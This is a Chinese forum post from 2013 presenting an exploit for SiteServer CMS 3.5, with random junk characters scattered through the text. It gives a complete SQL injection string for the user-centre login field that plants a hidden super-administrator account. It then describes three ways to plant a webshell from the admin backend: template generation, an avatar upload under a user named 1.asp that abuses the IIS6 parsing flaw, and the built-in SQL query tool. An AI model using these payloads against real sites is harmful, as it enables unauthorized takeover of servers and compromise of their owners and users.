经测试秒杀最新的3.5版
! R5 C, T( {) Y8 [stieserver官网:www.siteserver.cn F1 U- G! A; i7 w+ y* w6 [+ _. K
EXP:
( y; Y6 G5 g! _% \7 b直接访问UserCenter/login.aspx
" e+ l2 w/ g' m8 K3 k' R用户名处输入:
' c7 y) O3 v2 D7 ?! u: g, {# d# i/ z
& n% \# f6 Y! c) s a) }123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–4 d# z1 S% b% G2 n
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
, t8 G3 {3 U- \$ d! r) z7 G2 [% ^之后再访问后台SiteServer/login.aspx用插入的用户登陆
5 q J3 e% K& A `$ d$ ^后台拿webshell的三种方法:
3 F! ^& }3 H+ F+ J8 o, U9 p一、+ S D& {0 E. y" B$ d4 m* G% W
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
" \4 E& I- x. j4 Z7 H0 |二、- c' O/ K8 l5 `) L$ w" W
成员权限-》添加用户-》用户名为:1.asp
$ I( m3 L F$ a5 chttp://127.0.0.1/usercenter/) A5 g2 V9 A! R1 u9 r& {$ V7 e
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell0 e5 t9 o j$ K" B
(ps:后台添加用户时不会验证是否含有非法字符)
8 X- M; B* n: @/ f8 ~三、
6 H, a" M4 x6 D {* O系统工具-》实用工具-》机器参数查看
! M+ W" k+ n/ c可以看到数据库类型、名称,WEB路径: q9 K' q& E$ p+ S# J" ]9 E
系统工具-》数据库工具-》SQL语句查询6 r( {( m" G5 ]3 u7 t$ n
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对